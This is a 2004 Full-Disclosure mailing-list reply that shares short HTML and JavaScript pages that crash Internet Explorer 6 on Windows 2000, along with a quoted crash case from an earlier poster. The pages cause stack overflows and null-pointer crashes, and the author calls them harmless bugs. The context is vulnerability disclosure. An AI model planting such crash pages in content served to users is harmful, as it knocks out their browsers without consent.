Here are some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):

Stack overflows (_not_ buffer overflows):
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>

Null pointer:
<HTML style="width:expression(navigate('?#'))">
  <HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>

None of them pose a security risk and they all require JavaScript. So now I actually 
forgot why I decided to mention them in a reply to this post. Well, maybe MS can fix 
them in the next SP now that they know about them...

Cheers,
SkyLined

----- Original Message ----- 
From: "Martin" <[EMAIL PROTECTED]>
To: "Michal Zalewski" <[EMAIL PROTECTED]>
Cc: "Full Disclosure" <[EMAIL PROTECTED]>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-Disclosure] Web browsers - a mini-farce


> On Mon, 18.10.2004 at 16:18, Michal Zalewski wrote:
> 
> >   All browsers but Microsoft Internet Explorer kept crashing on a regular
> >   basis
> 
> Here, may I make your collection more complete?
> 
> This one is for IE6 on MS-Windows 2000:
> 
> <html><base href="ftp*://">
> <body>
> <iframe src="????"/>
> </body>
> </html>
> 
> Martin
> 
> PS: No, it's not been discovered by your tool. And I reported
>     it already several years ago.
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
